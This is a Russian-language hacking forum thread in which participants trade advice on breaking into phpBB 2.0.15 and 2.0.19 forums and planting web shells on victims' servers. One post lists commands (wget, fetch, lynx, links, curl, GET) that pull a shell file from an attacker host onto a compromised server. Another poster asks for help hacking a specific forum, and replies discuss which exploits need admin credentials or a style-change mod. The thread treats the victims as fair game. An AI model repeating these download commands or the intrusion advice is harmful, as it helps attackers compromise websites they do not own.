я уже вчера получил и просмотрел =)) у него почти получилось. Просто он не смог залить шелл.. Ну это уже кому как повезет с жертвой =))
слушайте а нах вам шелл заливать?кто качал последний выпуск езина от Мазы тот знает что там лежит измененный сплойт для пхпбб 2.0.15 и очень отлично работает и прост в управлении..
Народ, хоть тресни не могу понять как скачать или залить файл с\на сервер. Не могу составить запрос wget`ом. Помогите плиз.
хм я ощущаю себя маленькой собачкой которой показали вкусный кусок мяса а потом подвесили на прилачно расстоянии да так что мне до него не подпрыгнуть !!!=( Вот сижу облизываюсь и хочу всех убить !!!!!!!!!!
вопервых я не могу создать для него среду по некоторым приченам =( а биплатного шела вот неделю не могу найти чбы wget хотябы работал =( может кто подскажет сайтик где халява на шелл ????
Млииин ну вы даете, трудно почитать книжек, мануалов чтоль....... Вот споссобы закачек, еси один не работает то заработает другой метод wget: wget http://attacker/shellfile -o /папка метод fetch: fetch -p http://attacker/shellfile -o /папка метод lynx: lynx -source http://attacker/shellfile > /папка метод links: links -source http://attacker/shellfile > /папка метод curl: curl http://attacker/shellfile -o /папка метод GET: GET http://attacker/shellfile > /папка
Перепробовал все описаные способы нифига не получилось. может просто руки кривые. Помогите взломать http://в просьбы о взломах/forum/.
ph0en1x, если судить по тесту на определение версии, то форум принадлежит к 2.0.19, а не 2.0.15. Тогда тебе в поиск, там был эксплоит, правда он даалееекоо не везде работает. ЗЫ Если удастся взломать его - дай мне знать, сколько не бьюсь над 19-м - нифига не получается
А чо над ним биться то, всё равно ничего не получится. Ну только если у тебя есть логин и пасс админа или на форуме стоит мод смены стиля форума с главной страницы. Есть два сплойта к 19. Один: для выполнения команд если имеем логин и пасс админа. Второй (наверное тот который ты имел ввиду): реализовать уязвимость можно только на форумах где стоит мод смены стиля форума с главной страницы (таких не очень много).
bandera, ну это я знаю. Там же вроде xss была? Не бывает такого, что взломать нельзя. Особенно у phpBB